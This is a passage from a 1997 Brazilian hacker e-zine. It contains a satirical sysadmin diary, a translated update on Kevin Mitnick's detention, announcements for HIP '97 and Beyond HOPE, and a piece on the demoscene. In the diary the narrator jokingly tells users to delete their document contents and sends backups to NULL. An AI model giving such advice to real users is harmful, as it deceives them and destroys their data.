log de suporte da noite anterior. Pareceram ocupados. Tempos terriveis com Salvar/Replicacao de Conflitos.. 9:00 am Gerente de suporte chega. Quer discutir minha atitude. Cliquei no PhoneNotes SmartIcon. "Adoraria, mas estou ocupado. ", gritei enquanto pegava as linhas de suporte, que (misteriosamente) acenderam. 9:35 pm O chefe da equipe de P&D precisa de ID para novos empregados. Disse ele que precisava do formulario J-19R=3D9C9\\DARR\K1. Ele nunca tinha ouvido falar de tal formulario. Disse a ele que estava no banco de dados de FORMULARIOS ESPECIAIS. Ele nunca ouvira falar de tal banco de dados. Transferi a ligacao para o almoxarifado. 10:00 am Ana ligou pedindo um novo ID. Eu disse que precisaria da matricula, nome de depto, nome do gerente e estado marital. Rodei @DbLookup nos bancos de dados de Controle de Doencas e nao achei nada. Disse a ela que o novo ID estaria pronto de noite. Relembrando as licoes de "Reengenharia para Parceria de Usuarios", ofereci-me para entregar pessoalmente em sua casa. 10:07 am O cara do almoxarifado passou por aqui dizendo que estava recebendo ligacoes estranhas ultimamente. Ofereci a ele um treino em Notes. Comecando agora. Deixei ele olhando a console enquanto sai' para fumar. 13:00 pm Voltei da pausa para o cigarro. O almoxarife disse que os telefones ficavam tocando demais, entao ele transferia as ligacoes pra moca da cafeteria. Comeco a gostar desse cara. 13:05 pm Grande Comocao! Gerente de suporte cai num buraco aberto onde eu tinha tirado os tacos, na frente da porta do seu escritorio. Falei pra ele da importancia de nao entrar correndo na sala do computador, mesmo que eu grite "Meudeus -- Fogo!!" 14:00 pm A secretaria juridica liga e diz que perdeu a password. Pedi a ela que cheque sua bolsa, chao do carro e no banheiro. Disse que provavelmente caiu das costas da maquina. Sugeri que ela ponha durex em todas as entradas de ar que ela ache no PC. Grunhindo, ofereci-me para lhe dar nova ID enquanto ela colava os durex... 14:49 pm O almoxarife voltou. Quer mais aulas. Tirei o resto do dia de folga. Quarta 8:30 am Detesto quando os usuarios ligam pra dizer que o chipset nao tem nada a ver com fontes em um formulario. Disse a eles "claro, voces deviam estar checando o "bitset" e nao "chipset". Usuario bobo pede desculpa e desliga. 9:10am Gerente de suporte, com o pe engessado, volta ao escritorio. Agenda um encontro comigo para 10:00am. Usuario liga e quer falar com o gerente de suporte sobre terriveis socorros na mesa de suporte. Disse a eles que o gerente estava indo a uma reuniao. As vezes a vida nos da' material... 10:00 am Chamei o Luiz do almoxarifado pra ficar no meu lugar enquanto vou no escritorio do gerente. Ele disse que nao pode me demitir, mas que pode sugerir varios movimentos laterais na minha carreira. A maioria envolvida com implementos agricolas no terceiro mundo. Falando nisso, perguntei se ele ja' sabia de um novo bug que pega texto indexado dos bancos de dados e distribui aleatoriamente todas as referencias. A reuniao foi adiada... 10:30 am Disse ao Luiz que ele esta' se saindo muito bem. Ofereci-me para mostra-lo o sistema corporativo de PBX algum dia... 11:00 am almoco. 16:55 pm retorno do almoco. 17:00 pm Troca de turno. Vou pra casa. Quinta 8:00 am Um cara novo (Jonas) comecou hoje. "Boa sorte", disse a ele. Mostrei-lhe a sala do servidor, o armario de fios e a biblioteca tecnica. Deixei-o com um PC-XT. Falei pra ele parar de choramingar. O Notes rodava igual, tanto em monocromo quanto em cores. 8:45 am Finalmente o PC do novato deu boot. Disse a ele que iria criar novo usuario pra ele. Setei o tamanho minimo de password para 64. Sai' pra fumar. 9:30 am Apresentei o luiz ao Jonas. "Boa Sorte", comentou o Luiz. Esse cara nao e' o maximo? 11:00 am Ganhei do Luiz no domino. Luiz sai. Tirei o resto das pecas da manga ("tenha sempre backups"). Usuario liga, diz que servidor de contabilidade esta' fora do ar. Desconecto o cabo Ethernet da antena do radio (melhor recepcao) e ligo de volta no hub. Disse a ele que tentasse novamente. Mais um usuario feliz! 11:55 am Expliquei ao Jonas a politica corporativa 98.022.01 "Sempre que novos empregados comecam em dias que terminam em 'A' estao obrigados a prover sustento e repouso ao analista tecnico senior do seu turno" Jonas duvida. Mostrei o banco de dados de "politicas corporativas". "Lembre-se, a pizza e' de peperoni, sem pimenta!", gritei enquanto Jonas pisa no taco solto ao sair. 13:00 pm Oooooh! Pizza me da' um sono... 16:30 pm Acordo de uma soneca refrescante. Peguei o Jonas lendo anuncios de emprego. 17:00 pm Troca de turno. Desligo e ligo o servidor varias vezes (Teste do botao ON-OFF...). Ate' amanha... Sexta Feira 8:00 am Turno da noite continua tendo problemas para trocar unidade de forca do servidor. Disse a eles que estava funcionando direito quando sai. 9:00 am Jonas nao esta aqui ainda. Decidi que deveria comecar a responder as chamadas eu mesmo. 9:02 am Chamada de usuario. Diz que a base em Sergipe nao consegue replicar. Eu e Luiz determinamos que e' problema de fuso horario. Mandei eles ligarem para Telecomunicacoes. 9:30 am Meu Deus! Outro usuario! Eles sao como formigas, Dizem que estao em Manaus e nao conseguem replicar com Sergipe. Falei que era fuso horario, mas com duas-horas de diferenca. Sugeri que eles ressetasse o time no servidor. 10:17 am Usuario do Espirito Santo liga. Diz que nao consegue mandar mail pra Manaus. Disse pra eles setarem o servidor para 3 horas adiantado. 11:00 am E-mail da corporacao diz para todos pararem de ressetar o time dos servidores. Troquei o "date stamp" e reenviei para o Acre. 11:20 am Terminei a macro @FazerCafe. Recoloquei o telefone no gancho. 11:23 am O Acre liga, perguntando que dia e' hoje. 11:25 am Gerente de suporte passa pra dizer que o Jonas pediu pra sair. "Tao dificil achar boa ajuda...", respondi. O gerente disse que ele tem um horario com o ortopedista essa tarde e pergunta se eu me impor em substitui-lo na reuniao semanal dos administradores. "No problems", eu respondo. 11:30 am Chamo Luis e digo que a oportunidade bate `a sua porta e ele e' convidado para um encontro essa tarde. "Claro, voce pode trazer seu jogo de domino", digo a ele. 12:00 am almoco: 13:00 pm Comeco backups completos no servidor unix. Redireciono o device para NULL para o backup ser mais rapido. 13:03 pm Backup semanal completo. Cara, como eu gosto da tecnologia moderna! 14:30 pm Olho o banco de dados de contatos de suporte. Cancelo o compromisso de 2:45pm. Ele deve ficar em casa descansando. 14:39 pm Outro usuario ligando. Diz que quer aprender a criar um documento de conexao. Digo a ele para rodar o utilitario de documentos CTRL-ALT-DEL Ele disse que o PC rebootou. Digo a ele para chamar o microsuporte. 15:00 pm Outro usuario (novato) liga. Diz que a macro periodica nao funciona. Disse a ele para incluir a macro @DeleteDocument no final da formula e prometi a ele mandar-lhe o anexo do manual que indica isso. 16:00 pm Acabei de trocar a cor de frente de todos os documentos para branco. Tambem setei o tamanho da letra para 2 nos bancos de dados de ajuda. 16:30 pm Um usuario liga pra dizer que nao consegue ver nada em nenhum documento. Digo a ele para ir no menu Edit, opcao Select all, e apertar a tecla Del e depois refresh. Prometi mandar-lhe a pagina do manual que fala sobre isso. 16:45 pm Outro usuario liga. Diz que nao consegue ver os helps dos documentos. Digo a ele que irei consertar. Mudei a fonte para WingDings. 16:58 pm Conectei a cafeteira no hub Ethernet pra ver o que acontece... Nada... (muito serio). 17:00 pm O turno da noite apareceu. Digo a eles que o hub esta' agindo estranho Desejo um bom fim-de-semana. ---------------------------------------------------------------- ULTIMAS NOTICIAS DO MITNICK =========================== Update: Thursday, March 3, 1997 - traducao pagina www.2600.com/mitnick Fazem agora dois anos que Kevin Mitnick foi preso em Carolina do Norte por ser um hacker de computador "America's Most Wanted". Ate' este dia ele nao foi ainda levado a julgamento e nao tem indicacao de qualquer especie sobre o que o aguarda para o futuro. Recentemente, Kevin foi mantido em solitaria por 4 dias por nenhuma razao aparente. Uma coisa e' clara, porem. NAO foi porque ele tinha muitas latas de atum, como foi dito na revista Wired(*). Aquela peca procurou fazer um sarro da encrenca do cara e nao fez nada para chegar ao fundo da historia. De acordo com a ordem de detencao, ele foi colocado na solitaria porque era uma "preocupacao da seguranca". As autoridades de alguma forma (sem nem procurarem na cela de Kevin) chegaram a conclusao de que ele estava pronto para modificar um Walkman e transforma-lo num transmissor FM. Eles estavam com medo de que ele fosse coloca-lo dentro de um seus escritorios. Como Kevin Mitnick, sendo um prisioneiro, poderia ter ganho acesso a um dos escritorios deles esta' alem da nossa capacidade de compreensao. De qualquer forma, esta foi a razao pela qual ele foi levado de sua cela. Apos revistarem a mesma, guardas descobriram que ele tinha um ou duas violacoes menores (**) incluindo muitas latas de atum. Nao foi a razao inicial pela qual ele foi colocado na solitaria, porem. Desde seu retorno, muito de sua propriedade (***) nao foi devolvido, incluindo numeros da 2600 e Phrack que Kevin considera pertinentes ao seu caso. Enquanto estava metido na solitaria, todos os documentos legais (%) foram mais provavelmente vistoriados pelas autoridades. Enquanto ele estava capturado na Carolina do Norte, Kevin aceitou um acordo que permitia assumir a culpa para uma contagem de possessao de 15 ou mais ESN/MINs, o que recentemente foi definido como "artigos de acesso". Este acordo permitiu a ela ser transferido para a California onde poderia ser sentenciado por esta e outras violacoes de soltura. Originalmente, so' havia 23 acusacoes contra ele, uma por cada chamada de fone celular que tinha feito. Cada uma dessas acusacoes tinha uma pena maxima de 20 anos! Dentro do acordo, a sentenca variaria entre 2 e 8 meses por chamada. Ao retornar da Carolina do Norte, ele tambem foi acusado de seis alegacoes que ele violou a condicional. Duas foram retiradas em abril de 96 e Kevin entrou com uma acao contra duas alegacoes adicionais ja' que eram posteriores ao fim da condicional. Por estas alegacoes, as linhas de sentenciamento sugerem um total de 4 a 6 meses. O governo quer ele na cadeia por dois anos. Estes dois anos, mais os oito meses do acordo feito na Carolina do Norte (que o governo americano quer botar tudo junto) totalizam 32 meses. Do que se conclui que Kevin pode servir 32 meses em prisao antes que as acusacoes na California sejam encaminhadas. Obviamente, o logico seria trazer todas as sentencas ao mesmo tempo. Mas o governo nao quer fazer isso. O advogado da promotoria (David Schindler) disse que se Kevin se recusar a assinar o pedido de acordo, o governo poderia empurrar o dito pelo pais para enfrentar acusacoes em outras jurisdicoes. Ele tambem foi dito que ha' acusacoes contra ele do estado da Carolina do Norte aguardando tao logo sua sentenca atual termine. O governo esta' procurando usar o caso Mitnick para mandar uma mensagem para os hackers de computador de todo o pais. Nesse exato instante, a unica mensagem que vemos e' de que alguem que nunca foi provado ter danificado um sistema de computador ou ter tido qualquer tipo de compensacao financeira esta' sendo mantido preso sem um julgamento por gente bem poderosa. E' tatica comum para a Promotoria ir atras de alguem tantas vezes quanto necessario ate' conseguir a sentenca que eles querem. Se eles nao conseguem a sentenca que querem na primeira rodada, eles rolam os dados de novo no proximo distrito. E ja' que ninguem esta' questionando isto, eles podem manter a coisa indefinidamente. Acredita-se que uma vez que as autoridades finalmente consigam passar por cima das acusacoes, vao fazer parecer que o Kevin roubou milhoes de dolares em software. Mas representantes da Motorola, uma das companhias involvidas, mantem que tal fraude nao ocorreu. Imediatamente apos ser indiciado em 25 contagens em setembro de 96, o advogado de Kevin preencheu um pedido para a folha de especificidades, que e' basicamente u pedido p. ser mais especifico contra o que ele estava sendo acusado. Kevin so'recebeu tambem uma pequena parcela do que foi descoberto (qualquer tipo de documentos ou evidencia para ser usado contra ele). Considerando que esteve dois anos preso, esta falha e' ultrajante. A proxima seria no dia 15 de abril de 1997. Littman, que escreveu "O jogo do fugitivo", da' um relato mais apurado da coisa toda. For a really good summary of the latest Mitnick happenings, check out Jon Littman's Fugitive Game update site at: http://www.well.com/user/jlittman/game/news.html Voce pode escrever para Mitnick (dando uma forca ou pelo menos pro cara saber que nao esta' so', abandonado no mundo) no endereco: Kevin Mitnick 89950-012 P.O. Box 1500 Los Angeles, CA 90053-1500 E X C L U S I V E K E V I N M I T N I C K U P D A T E "Eles jogaram o Kevin no buraco na terca", disse Saul Moore, um interno no Centro de Detencao Metropolitano de Los Angeles. "Eles disseram que e' porque ele esta' sendo investigado como risco de seguranca. Foi dito que ele representa um perigo para a instituicao. Ele pode ter dito alguma coisa sobre usar computadores para alguem." Moore disse que as autoridades levaram as calcas, revistas e livros de Mitnick. "Ele esta'sentado na sua cela de cuecas." Eu perguntei a Moore como ele sabia disso tudo. "Os dutos," explicou. "Nos (prisioneiros) podemos nos comunicar." Mitnick ligou no ano novo. "Eu estava na biblioteca as 10:30, na sexta," disse quase imediatamente, me dando um resumo. "As 10:45 eu cheguei na minha cela. Eles nao me deixavam entrar na minha unidade. Eu vi um dos policiais que conhecia. Ele disse, "voce ta' numa m(*) seria, voce vai pro buraco". Mitnick nao estava certo sobre o que que era. Um guarda estava ensacando seus papeis legais, revistas e livros. Ele especulou que queriam dar uma fucada na sua linha de defesa. "E' por causa das latas de atum?" perguntou. O fussador de micros nao comia muito da comida da prisao e amontoou 72 latas de atum na sua cela. "Nao. Eu nao posso te dizer", teria dito o guarda. A medida que os guardas levaram Mitnick embora, ele gritou o numero do seu advogado para um presidiario, que anotou, mas teve o papel tomado por outro guarda. Nem iriam os guardas permitir que o proprio Mitnick chamasse seu advogado. Ele foi revistado, algemado e levado para a solitaria unidade de confinamento da prisao, a cela 8. Nenhum dos guardas lhe diria o que tava rolando. Trancaram-no no que e' chamado cela de quatro pontas. "E' onde poem os presos mais incontrolaveis. Eles te amarram numa mesa de metal," lembra Mitnick. "Eu estava com medo. Eles me despiram e deixaram la', nu." Mitnick "mucuzou" o numero do seu advogado atraves da "Intervento", (duto de ventilacao usado p. comunicacao) na esperanca que um amigo presidiario telefonasse seu advogado e a familia pra pedir ajuda. Disse ele ter ouvido que "estava sendo investigado como ameaca de seguranca," mas ele se perguntou tambem se o governo nao estava "brincando" com ele. "Eles acreditavam que eu tinha o conhecimento ou know how para modificar um Walkman normal num transmissor" Algum tempo depois das 17:00, entregaram p. ele um papel da administracao da detencao que disse que ele estava sob investigacao por uma "questao de seguranca". Mitnick foi pedido que assinasse o documento, reconhecendo a posse do material confiscado: 16 envelopes contendo seus papeis legais e busca da internet, revistas e artigos de radio amador, eletronica e computadores, seu walkman, relogio e latas de atum. Quase dez horas depois de cair na solitaria, Michelle Caswell, um associado da firma de advogacia de Mitnick, chegou. A "Interventilacao" funcionou. Os oficiais da prisao providenciaram uma camiseta e short de prisao p. a visita. Caswell pediu que fosse tambem fornecido uma escova de dentes e cobertor. Ela estava recebendo historias conflitantes sobre porque Mitnick havia sido colocado na solitaria. Um guarda disse que foi por causa das latas de atum na cela; outro disse que foi por causa de segredos que Mitnick tinha aprendido e a informacao que tinha guardada na cela. Foram quatro dias passados em confinamento na solitaria. Quando saiu nao estava certo ainda qual a razao da blitz e tambem da solitaria. Muito do material confiscado foram impressos da internet que os amigos tinham enviado, material disponivel publicamente. "eu ainda gostaria de chegar ao fundo da questao do porque invadiram minha cela," me disse, sem o humor que uma vez escutei na sua voz.. "foi isto para pegar meus papeis (legais) ou um tratamento p me f(*)?" Nos dias seguindo sua soltura Mitnick ouviu uma nova teoria sobre o porque ele foi punido. "Agora estao dizendo que eu tinha material legal demais na minha cela. Eles me disseram que foi por causa das minhas notas sobre outros casos de hackers, todos os numeros da 2600, o caso Neidorf. Eu estava anotando tudo para o meu advogado." O advogado de Mitnick se encontrou com um guarda e ouviu finalmente porque o hacker foi despido, revistado e jogado na solitaria. "Eles acreditavam que eu tinha o conhecimento ou know- how para modificar um radio walkman num transmissor", disse. [...] "Ridiculo, eu nao tinha ferro de soldar ou outros componentes necessarios" e alem disso "estou preso numa cela. Como vou colocar o transmissor nos escritorios deles". Pra simplificar, nenhum walkman modificado foi achado. Quando o material legal de Mitnick foi devolvido (mas nao as listagens da internet e outras possessoes) o hacker notou um buraco no seu documento mais confidencial, a cronologia dos fatos que preparou para o seu advogado. "E' muito suspeito,"disse Mitnick. Eu ainda nao sei ate' hoje se eles copiaram meu material legal (de defesa)." NOTA DO BARATA ELETRICA: Comparado com o presidiario comum brasileiro, ate' que o Kevin nao esta' apanhando muito. Mas quando voce pensa que isso acontece nos EUA, que seria o maior exemplo de democracia, a coisa fica um pouco mais seria. Esse tempo de prisao que ele sofreu ate' agora, quase dois anos, nao vai contar quando ele receber a pena. E o sujeito ainda nao foi acusado tecnicamente acusado de nada. O preso, de acordo com a legislacao americana, (***) pode ou nao ter o direito de ter algo que chame de propriedade, coisas pessoais. Papeis contendo informacoes necessarias (%) para a defesa podem ser guardados na cela e estudados pelo detento. Mas e' comum os presidiarios reclamarem de carcereiros que roubam esses objetos, por gana, maldade ou amendrontar os presos. E obvio, tem coisas que o preso nao pode possuir em sua cela, as vezes e' tolerada, as vezes nao (tipo comida extra, bebida, etc).. Pelo menos foi o que entendi do filme "grito de liberdade". ADENDO: Ate' o fechamento desta edicao, nao havia noticias sobre como foi a audiencia no dia 15/04 . O mais proximo de um relato era de que o responsavel pela condicional de Mitnick havia deturpado alguns fatos. A coisa toda foi adiada para mais tarde, outra audiencia. A revista 2600 montou uma lista de discussao (em ingles, parece obvio, mas tem muito cara que precisa saber disso) para ajudar. O endereco para subscricao e': majordomo@2600.com E no texto, os dizeres: subscribe mitnick Nao precisa de nada no "subject". Eles mandam uma carta com instrucoes para voce confirmar a inscricao e .. pronto. Talvez o que mais ajude seja um postal dando uma forca pro cara, que deve se achar sozinho no mundo. ========================================================== ALGUNS ENCONTROS DE HACKERS NO MUNDO TODO ========================================= Vao rolar alguns encontros de hackers num futuro proximo, melhor dizendo 8/agosto nos EUA e na Holanda, alem do Access All Areas na Inglaterra, em julho e o Defcon em Las Vegas, nos EUA em julho tambem. Aqui vao alguns anuncios. Se alguma revista se interessar em pagar as despesas de viagem em troca de reportagens, to^ aceitando ofertas... Com a grande vantagem de que ja' sou conhecido do Computer Underground Internacional (sair na 2600 3 vezes contando sobre o Brasil ajuda um pouco) e posso conseguir a palavra dos caras bem mais facil... HIP '97 http://www.hip97.nl What is HIP? HIP is an acronym for 'Hacking In Progress'. It will take place on the Friday 8th, Saturday 9th and Sunday 10th of August 1997 at campsite Kotterbos, Aakweg, Almere in The Netherlands. The campsite is about a 30 minutes drive from Amsterdam. Remember 'Hacking at the End of the Universe' (HEU) in 1993? The people that published Hack-Tic, a computer underground magazine in The Netherlands, organized it. Hundreds of hackers, phone phreaks, programmers, computer haters, data travellers, electro-wizards, networkers, hardwarefreaks, techno-anarchists, communications junkies, cyber- and cypherpunks, system managers, stupid users, paranoid androids, Unix gurus, whizz kids and warez dudes spent three days building their own network between their tents in the middle of nowhere, located in the Flevopolder in The Netherlands. HIP will be the sequel to HEU. A campsite full of PCs, laptops, and Unix machines, all connected via an intertent Ethernet that is connected to the Internet. People from all over The Netherlands and other countries will come together to learn and discuss the benefits, as well as the risks of new technologies. They'll listen to lectures, join workshops, enjoy special presentations and, last but not least, party, all of this in a friendly open-air environment of a very wired campsite far away from the civilized world. HIP will happen on the same days as Beyond HOPE, a hacker convention in New York, organized by the people of 2600 Magazine. There will be audio and video links between both events, and we're working on cool gadgets to further enhance your sense of 'grassroots telepresence'. This will be a twin-event in the true sense of the word. Who is organizing HIP? Once there was a little magazine in The Netherlands called 'Hack-Tic', and it published wild ways to play tricks on the information infrastructure of the world. The magazine doesn't exist anymore, but most of the people that wrote articles for the magazine or helped organize Hacking at the End of the Universe (1993) and even some of the people that helped put up the Galactic Hacker Party (1989) are still in touch with each other. The every-four-year-itch has gotten to us again... It's going to be quite a project to organize something that is better than HEU, but we're not facing it alone. We'll get lots of people to help us. The hackers that were present at HEU have successfully infiltrated in key positions to aid in the upcoming political takeover as was agreed. Many have the agreed-upon provisions in their job contracts since 1993, stating they would need time off for the final strategic meeting. HIPcamp and HIPnet There'll be no hotel rooms or anything like that so you'll want to bring at least a tent and a sleeping bag to HIP, even if this means you can't bring the paper-tape unit that came with your VAX 11/780. We'll supply a campground, toilets, showers, good food and electrical power (as close to 220V/50Hz as possible) and we'll do our best to supply everyone who wants it with an Ethernet connection. You will probably be able to trade wiring, extra outlets, Ethernet cards, and the use of modular crimping tools for almost anything. HIPcamp will open on August 5th, three days before HIP starts. If you decide to join in that early expect pretty primitive circumstances. If you don't care about that, or think that's the best part, you can help build HIPnet and all other facilities. HIP stuff A lot can and will happen in the coming months, and we'll keep adding new topics even during the event itself. But we're definitely going to discuss the legal situation regarding encryption, as well as the latest technical developments in this field. The current decay of the Usenet, copyright issues, censorship as well as many other legislative, social, political and technical issues surrounding Internet will be discussed. Computer security, or the lack thereof will also be a hot topic. We'll have research workshops (i.e. GSM and chipcard security) and you can also join many 'how-to' workshops and lectures where you can pick up on Linux (Unix you can run at home, not built by Microsoft), perl (a very powerful computer language) and many, many other topics. Tired of all these lectures and workshops? Just sit down, smoke or drink socially accepted substances, interact with other humans, volunteer for kitchen work and have a good time. We've had people at the previous event that were not into computers at all, and they had fun. We'd like to receive as many ideas from you as possible at this stage. So if you (and some of your friends) want to organize a lecture or workshop, please let us know. If you keep having this wacky dream about some project or construction that would work really well in an environment with lots of other freaks, this is your call to action. We dream of an event with thousands of creators and no audience. No audience? We'll try to offer different ways for the Internet population to truly interact with the events at HIP. Please get in touch if you'll have some friends at your house and you want to have CU-SeeMe or other connections to us. We'll also be broadcasting live and buffered feeds of audio and video on the net. Mass-media coverage will be provided for the interactively challenged. Press All press is welcome to visit HIP, but there will be a few strict rules. All members of the press will pay the entrance fee, no discussion about this. There will be a part of the campsite that is off-limits to all press. No filming, photographing or recording is to take place there. Some people like to have a press-free moment, some have employment-related reason for shunning media attention. What else? Many more things could be said but it is still a bit early. The main networking tent and the bar will be open 24 hours a day and we'll have a depository to stash your laptops, backpacks and other valuables. We haven't figures out the exact entrance fee, but, just like HEU, HIP is going to be a non-profit event. And if you haven't guessed it yet: all workshops and plenary events will take place in English. I want to be HIP too! Don't worry: you can be! Subscribe to the announcement mailing list. It's spam-free and will only carry HIP announcements written by us. You can also participate in the ongoing, yet slightly messy debate in the newsgroup alt.hacking.in.progress. If you can't find the newsgroup don't contact us. Refresh the grouplist in your newsreader or ask your access provider to check their newsfeed. Heavily sponsored by XS4ALL *88888888888888888888888888888888888888888888888888888888888888 Beyond HOPE http://www.2600.com The "Follow On" Conference to Hackers On Planet Earth (HOPE) http://www.hope.net New York City 1997 August 8, 9, & 10 * About Beyond HOPE Beyond HOPE is a conference of hackers, phreaks, and netizens. Anyone is welcome, but we ask that you be prepared to listen at least half as much as you talk. * Where is Beyond HOPE being held? The Puck Building is in New York City on Houston Street between Lafayette and Mulberry. It is just south of Greenwich Village, and on the border of the Soho district. There is a floor plan available. * Where to stay Details on which hotels will be linked to the conference will be announced soon in this space. In the meantime, here are some nifty hotel links in New York City to give you an idea of what to expect. * Directions Subway: Take the Number 1 Local to Houston St and walk east. Take the Number 6 Local to Bleecker St and walk a block south. Take the A, C, or E train to Spring St and walk two blocks north. You're looking for the large building that says "The Puck Building" on it in large, friendly letters. Scholars of Shakespeare's "A Midsummer's Night Dream" will recognize the statue of Puck. Taxi: Tell the cabbie to go to Houston St and Lafayette. Note: There will be a special 2600 meeting on Friday, August 8th from 5 pm to 8 pm at the Citicorp Center on 53rd and Lexington. To get to the conference from there, just hope on a downtown Number 6 train and get off at Bleecker Street. * How to get involved Get involved by e-mailing us. Be sure to include what you wish to do at the conference. * Planned events and other details Lectures, Seminars, and "hands-on" demonstrations of various techno-topics. What do you plan to do? (expect a hyper link here when we have a schedule planned - it's not ready yet). * Suggestions Please suggest things yourself. E-mail us, and they may wind up here. Suggestions received so far: + A seminar on "low bandwidth" access to the Internet from text based terminals such as those at public libraries. + A local area network on-site!! And hooked up to the Internet. + Internet Links to the HIP Conference in The Netherlands being held at the same time. Voice, data, and video links are "in-work". * About the Puck building As everyone who really knows New York City agrees, the Puck Building is one of our most exceptional landmarks. Listed on the National Historic Register, this grand Romanesque Revival structure was designed by Albert Wagner and built in 1885 for the J. Ottman Lithographic Company. Originally, the land on which the building stands was farmland owned by Nicholas Bayard. During the mid 1800's, the property held a house occupied by the Sisters of Charity, which was purchased and demolished in 1885 when construction of the current building began. The building's style reflects the Chicago School of architecture which was known for steel frame construction, horizontal bands of windows, and the skillful use of brick. In the case of the Puck, an unusual type of thin-line English brick was chosen for the facade. The building's exterior projects a feeling of strength balanced by lightness and graceful simplicity. more on the Puck Building.... * About NYC What more needs be said? It's New York City, after all. The Bronx is up, and The Battery's down. Here's the Official New York City Web Site to help you. You'll also want to get tourist map s & brochures (if you have a high speed Internet link) from the New York Convention and Visitors Bureau Home Page. * BeyondHope FAQ E-mail questions, and they will be answered, and might show up here. * How to Pre-register Haven't gotten that far yet, but as you can see, we're thinking about it. * The Network We will have at the very least a T1 connection to the outside world. This promises to be one of the best network connections ever at a hacker conference. Again, to get involved, e-mail us. ------------------------------------- DEF CON V - Julho 11-13 - Las Vegas, Nevada - http://www.defcon.org ------------------ _________________________________________________________________ DEMO CODING: HACKING , ARTE , OU O QUE? ======================================= Edward de Oliveira Ribeiro Ola! Eh incrivel como ,dentre todos os (novos) habitos culturais trazidos pela Internet e BBS's mundo afora , o hacking tenha chamado tanta atencao.Eh... "Computer Underground" soa bem aos ouvidos , embora seja frustante o fim de jovens talentosos como (o superstar) Mitnick, Phiber Optik e cia. Sera que todo fucador brilhante tem que ir pra cadeia? Faz parte do show? Bem, sinceramente eu acredito que nao. E nao estou sozinho. Prova disso eh o crescimento mundial da "demoscene". Demo... O que? Demoscene( literalmente cena demo) eh um movimento(?) onde jovens se reunem em grupos para ensinar e aprender programacao ,alem de criarem seus proprios programas. Muito parecido com a cena hacker ,nao? A diferenca eh que neste caso os tais programas nao tem nada a ver com cracking e sim com arte. Os tais demos nada mais sao do que programinhas executaveis DEMOstrativos que tentam extrair o maximo do micro em materia de computacao grafica e efeitos especiais.Ray tracing, rotacao 3D, simulacao de fogo e morphing sao super explorados. Um p*** exercicio de criatividade e programacao. O tamanho dos programas varia de 4k (as chamadas Intros) a 2.0 mega e o estilo tambem(cada grupo de demo-coding tem os seus proprios macetes de programacao e otimizacao de software que so os membros do grupo conhecem).Vale ressaltar que nem todos os integrantes dos grupos de demo-coding sao programadores,ou melhor,"coders"(codificadores). Como os demos lancados muitas vezes sao superproducoes eh muito comum (quase regra) encontrar artistas graficos e musicos participando em postos em definidos. Ao que parece esta eh uma cena antiga ,surgida nos tempos das BBS's , pois varios amigos meus dessa epoca virao ou tiveram algum programa de demo-groups famosos como Future Crew. A coisa parece que ta esquentando mesmo eh com a InterNet ,embora vc precise de paciencia pra achar material sobre o assunto(dica:Procure no Yahoo por "demoscene"). Pelo que pude constatar a maioria dos demo-groups vem de paises europeus como a Finlandia(principalmente!!!) , Franca e Belgica. O Brasil,ainda nao tem uma demoscene forte,mas isso eh so uma questao de tempo,uma vez que a galera das BBS nao para de colocar no ar sites para divulgar o assunto,sem falar nos demo-groups nacionais que estao surgindo . Ah, quase ia esquecendo... um bom combustivel para toda essa cena sao sem sombra de duvida as "parties"(festas) organizadas por e para demo-groups. Mas pode tirar da cabeca a ideia de alcool ,drogas e baderna, as parties nada mais sao do que concursos a nivel local,nacional e ate internacional(!) de demo-coding.Com comissao julgadora ,telao ,premios e tudo o mais. As vezes vai gente de toda a Europa para,por exemplo, a Belgica so pra ver/participar da disputa realizada em varios niveis (tem ate de musica mod/wav/midi). Alguns cobram uma pequena taxa de adesao para cobrir os custos ,uma vez que algumas parties chegam durar uma semana inteira varando a noite ( mulheres nao pagam! :-) ). Existem aqueles demo-groups que ja se tornaram famosos tipo o citado Future Crew,Complex,NoooN e outros de nomes esquisitissimos(obs:os membros dos demo-groups tb sao identificados por apelidos). Os demos desses grupos sao de fazer o Hans Donner e o Spielberg irem vender balinha no sinal de transito de tao bem produzidos. Tanto eh assim que o demo acaba sendo um belo portfolio de apresentacao. Os coders do Future , por exemplo , estao trabalhando num projeto de acelerador grafico 3D ( tipo MMX ) chamado Piramid3D pra Triangle Software enquanto o musico do grupo ta compondo trilha prum jogo duma empresa cujo nome eu esqueci. Sem falar que Psi ,um dos principais coders do Future ,inventou(eh inventou!)um padrao de audio semelhante ao MOD soh pra incrementar ainda mais os demos(pra falar a verdade ele nao foi o unico,varios outros coders inventaram padroes semelhantes). Isso mostra que os caras alem de aprenderem a programar/compor/desenhar os caras se dao bem gracas aos demos. Se vc se interessou pelo demo-coding e deseja entrar nesse universo ai vao algumas dicas/conselhos: 1)Os coders iniciantes podem comecar com o Pascal,uma vez que os tutoriais para demo-coding sao em sua maioria sao nessa linguagem. Contudo tenha em mente que se vc quiser ir alem do arroz-com-feijao tera mais cedo ou mais tarde que cair no Assembler : puro ou com gelo(no caso C); 2)Encare os demos como uma campanha publicitaria,afinal eles eh que vao construir a imagem do seu grupo. Demos mais trabalhados chegam a levar de tres a seis meses para serem feitos; 3)Aprenda com os codigos-fontes de demos disponiveis na rede ,mas em hipotese alguma roube ideias de apresentacao. A essencia do demo-coding esta em criar seus PROPRIOS demos usandos as tecnicas e macetes aprendidos. 4)Troque informacao com seus colegas de grupo e com outros grupos.Claro, existirah aquele algoritmo de rendering fantastico que alguem da sua turma inventou e que nao seria vantajoso doar pra qualquer wanna-be,entao nesse caso troque por um metodo de otimizacao de rotinas que a turma "rival" inventou; 5)Os tutoriais distribuidos pela Net vao ser de grande valia. No endereco ftp.cdrom.com vc encontra toneladas deles,contudo,lembre-se que eles nao vao ensinar tudo.Na verdade estao bem longe disso,uma vez que sao so o ponto de partida para voos mais altos. Se quer ser um fucking coder tera que gastar tempo e dinheiro em livros. Nao eh facil e nao eh para todos, infelizmente; 6)Vasculhe o Altavista e o Lycos usando "demoscene" como palavra chave; 6.1)Vasculhe tb as BBS's em busca de demos/informacao; 7)Um ultimo aviso:se por acaso voce quiser apenas pescar demos bacanas na Net tenha o cuidado de contar com um bom anti-virus p/ fazer a limpeza,pois nunca sabemos ao certo o que nos estamos levando para casa.>:=/ Segue anexo um roteiro de uma party supostamente realizada no final do ano passado na Belgica: =C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4[ 10. PARTY S= CHEDULES ]=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4= =C4=C4 FRIDAY 01.11.96 11: Party 